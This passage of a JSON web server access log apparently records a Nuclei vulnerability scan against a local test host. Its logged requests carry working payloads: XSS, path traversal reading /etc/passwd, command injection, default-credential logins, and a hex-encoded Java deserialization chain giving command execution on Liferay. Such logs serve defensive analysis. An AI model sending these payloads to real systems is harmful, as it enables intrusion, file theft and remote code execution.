name=\x22type\x22\x0D\x0A\x0D\x0Aclick\x0D\x0A-----------------------------350278735926454076983690555601\x0D\x0AContent-Disposition: form-data; name=\x22upload-file\x22; filename=\x2229K6BdZgj0sYG3IQVFvzCbNP1PY.txt%\x22\x0D\x0AContent-Type: application/x-httpd-php\x0D\x0A\x0D\x0ACVE-2020-12800-29K6BdZgj0sYG3IQVFvzCbNP1PY\x0D\x0A-----------------------------350278735926454076983690555601--\x0D\x0A","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /wp-admin/admin-ajax.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/changedResource.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /bugs/verify.php?confirm_hash=&id=1 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /nextcloud/index.php/login HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /fuel/pages/select/?filter=%27%2bpi(print(%24a%3d%27system%27))%2b%24a(%27cat%20/etc/passwd%27)%2b%27 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5C%5Cexample.com/%252e%252e%252f HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.041","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"login=branding&password=branding&Submit=Login","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /webadmin/auth/verification.php HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.032","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"http://127.0.0.1/webadmin/start/", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /roundcube/logs/errors.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.030","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /home.html HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.035","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/swipehq-payment-gateway-woocommerce/test-plugin.php?api_url=api_url%27%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.056","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/campaign/count_of_send.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.031","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:registerGuest\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22name\x5C\x22:\x5C\x22cve-2020-nuclei\x5C\x22,\x5C\x22email\x5C\x22:\x5C\x22cve@nuclei.local\x5C\x22}],\x5C\x22id\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.033","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2225.0 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /KeepAlive.jsp?stamp=16170297%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2117.157 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /v2/keys/ HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.034","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /application/logs/access.log HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/uploads/wp_dndcf7_uploads/wpcf7-files/29K6BdZgj0sYG3IQVFvzCbNP1PY.txt HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.1 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?%27)%3Balert(%22XSS HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /index.php?page_slug=../../../../../etc/passwd%00 HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.029","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2224.3 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /remotereporter/load_logfiles.php?server=018192&url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5Cexample.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (X11; Ubuntu; Linux i686 on x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2820.59 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.026","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /password.cgi HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.028","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.3319.102 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2226.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET //example.com HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.027","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-login.php?redirect_to=http%3A%2F%2F%3F1%3C%2FsCripT%3E%3CsCripT%3Ealert%28document.domain%29%3C%2FsCripT%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /wp-content/plugins/mail-masta/inc/lists/csvexport.php?pl=/etc/passwd HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/40.0.2214.93 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22message\x22:\x22{\x5C\x22msg\x5C\x22:\x5C\x22method\x5C\x22,\x5C\x22method\x5C\x22:\x5C\x22livechat:loadHistory\x5C\x22,\x5C\x22params\x5C\x22:[{\x5C\x22token\x5C\x22:\x5C\x22cvenucleirocketchat\x5C\x22,\x5C\x22rid\x5C\x22:\x5C\x22GENERAL\x5C\x22}],\x5C\x22msg\x5C\x22:\x5C\x22123\x5C\x22}\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/v1/method.callAnon/cve_exploit HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /openam/oauth2/..;/ccversion/Version HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /1.sql HTTP/1.1","status":"206","body_bytes_sents":"3001","req_time":"0.023","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_10_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2062.124 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /plugins/servlet/svnwebclient/commitGraph.jsp?url=%22%3E%3Cscript%3Ealert(document.domain)%3C%2Fscript%3E HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.019","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_4) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2656.18 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.htm HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.021","http_user_agent":"Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /%5cexample.com/%2f%2e%2e HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.024","http_user_agent":"Mozilla/5.0 (Windows NT 6.3; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/37.0.2049.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET / HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Windows NT 6.2; WOW64) AppleWebKit/537.36 (KHTML like Gecko) Chrome/44.0.2403.155 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /about_state HTTP/1.1","status":"200","body_bytes_sents":"1986","req_time":"0.025","http_user_agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36", "http_referer":"-", "request_method":"GET", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"cmd=%7B%22%2Fexpandocolumn%2Fadd-column%22%3A%7B%7D%7D&p_auth=nuclei&formDate=1597704739243&tableId=1&name=A&type=1&%2BdefaultData:com.mchange.v2.c3p0.WrapperConnectionPoolDataSource=%7B%22userOverridesAsString%22%3A%22HexAsciiSerializedMap%3AACED0005737200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000023F40000000000001737200346F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6B657976616C75652E546965644D6170456E7472798AADD29B39C11FDB0200024C00036B65797400124C6A6176612F6C616E672F4F626A6563743B4C00036D617074000F4C6A6176612F7574696C2F4D61703B7870740003666F6F7372002A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E6D61702E4C617A794D61706EE594829E7910940300014C0007666163746F727974002C4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436861696E65645472616E73666F726D657230C797EC287A97040200015B000D695472616E73666F726D65727374002D5B4C6F72672F6170616368652F636F6D6D6F6E732F636F6C6C656374696F6E732F5472616E73666F726D65723B78707572002D5B4C6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E5472616E73666F726D65723BBD562AF1D83418990200007870000000057372003B6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E436F6E7374616E745472616E73666F726D6572587690114102B1940200014C000969436F6E7374616E7471007E00037870767200206A617661782E7363726970742E536372697074456E67696E654D616E61676572000000000000000000000078707372003A6F72672E6170616368652E636F6D6D6F6E732E636F6C6C656374696F6E732E66756E63746F72732E496E766F6B65725472616E73666F726D657287E8FF6B7B7CCE380200035B000569417267737400135B4C6A6176612F6C616E672F4F626A6563743B4C000B694D6574686F644E616D657400124C6A6176612F6C616E672F537472696E673B5B000B69506172616D54797065737400125B4C6A6176612F6C616E672F436C6173733B7870757200135B4C6A6176612E6C616E672E4F626A6563743B90CE589F1073296C02000078700000000074000B6E6577496E7374616E6365757200125B4C6A6176612E6C616E672E436C6173733BAB16D7AECBCD5A990200007870000000007371007E00137571007E00180000000174000A4A61766153637269707474000F676574456E67696E6542794E616D657571007E001B00000001767200106A6176612E6C616E672E537472696E67A0F0A4387A3BB34202000078707371007E0013757200135B4C6A6176612E6C616E672E537472696E673BADD256E7E91D7B470200007870000000017404567661722063757272656E74546872656164203D20636F6D2E6C6966657261792E706F7274616C2E736572766963652E53657276696365436F6E746578745468726561644C6F63616C2E67657453657276696365436F6E7465787428293B0A76617220697357696E203D206A6176612E6C616E672E53797374656D2E67657450726F706572747928226F732E6E616D6522292E746F4C6F7765724361736528292E636F6E7461696E73282277696E22293B0A7661722072657175657374203D2063757272656E745468726561642E6765745265717565737428293B0A766172205F726571203D206F72672E6170616368652E636174616C696E612E636F6E6E6563746F722E526571756573744661636164652E636C6173732E6765744465636C617265644669656C6428227265717565737422293B0A5F7265712E73657441636365737369626C652874727565293B0A766172207265616C52657175657374203D205F7265712E6765742872657175657374293B0A76617220726573706F6E7365203D207265616C526571756573742E676574526573706F6E736528293B0A766172206F757470757453747265616D203D20726573706F6E73652E6765744F757470757453747265616D28293B0A76617220636D64203D206E6577206A6176612E6C616E672E537472696E6728726571756573742E6765744865616465722822636D64322229293B0A766172206C697374436D64203D206E6577206A6176612E7574696C2E41727261794C69737428293B0A7661722070203D206E6577206A6176612E6C616E672E50726F636573734275696C64657228293B0A696628697357696E297B0A20202020702E636F6D6D616E642822636D642E657865222C20222F63222C20636D64293B0A7D656C73657B0A20202020702E636F6D6D616E64282262617368222C20222D63222C20636D64293B0A7D0A702E72656469726563744572726F7253747265616D2874727565293B0A7661722070726F63657373203D20702E737461727428293B0A76617220696E70757453747265616D526561646572203D206E6577206A6176612E696F2E496E70757453747265616D5265616465722870726F636573732E676574496E70757453747265616D2829293B0A766172206275666665726564526561646572203D206E6577206A6176612E696F2E427566666572656452656164657228696E70757453747265616D526561646572293B0A766172206C696E65203D2022223B0A7661722066756C6C54657874203D2022223B0A7768696C6528286C696E65203D2062756666657265645265616465722E726561644C696E6528292920213D206E756C6C297B0A2020202066756C6C54657874203D2066756C6C54657874202B206C696E65202B20225C6E223B0A7D0A766172206279746573203D2066756C6C546578742E676574427974657328225554462D3822293B0A6F757470757453747265616D2E7772697465286279746573293B0A6F757470757453747265616D2E636C6F736528293B0A7400046576616C7571007E001B0000000171007E00237371007E000F737200116A6176612E6C616E672E496E746567657212E2A0A4F781873802000149000576616C7565787200106A6176612E6C616E672E4E756D62657286AC951D0B94E08B020000787000000001737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000077080000001000000000787878%3B%22%7D","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /api/jsonws/invoke HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.022","http_user_agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_2) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1944.0 Safari/537.36", "http_referer":"http://127.0.0.1/api/jsonws?contextName=&signature=%2Fexpandocolumn%2Fadd-column-4-tableId-name-type-defaultData", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"{\x22user\x22:\x22admin\x22,\x22password\x22:\x22password\x22,\x22type\x22:\x22login\x22}","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"POST /ui/api/v1/ui/auth/login HTTP/1.1","status":"405","body_bytes_sents":"559","req_time":"0.025","http_user_agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36", "http_referer":"-", "request_method":"POST", "http_x_forwarded_for":"-"} +{"@timestamp": "18/May/2022:04:48:16 +0000","request_body":"-","remote_addr":"192.168.144.1","http_host":"127.0.0.1","request":"GET /status.php 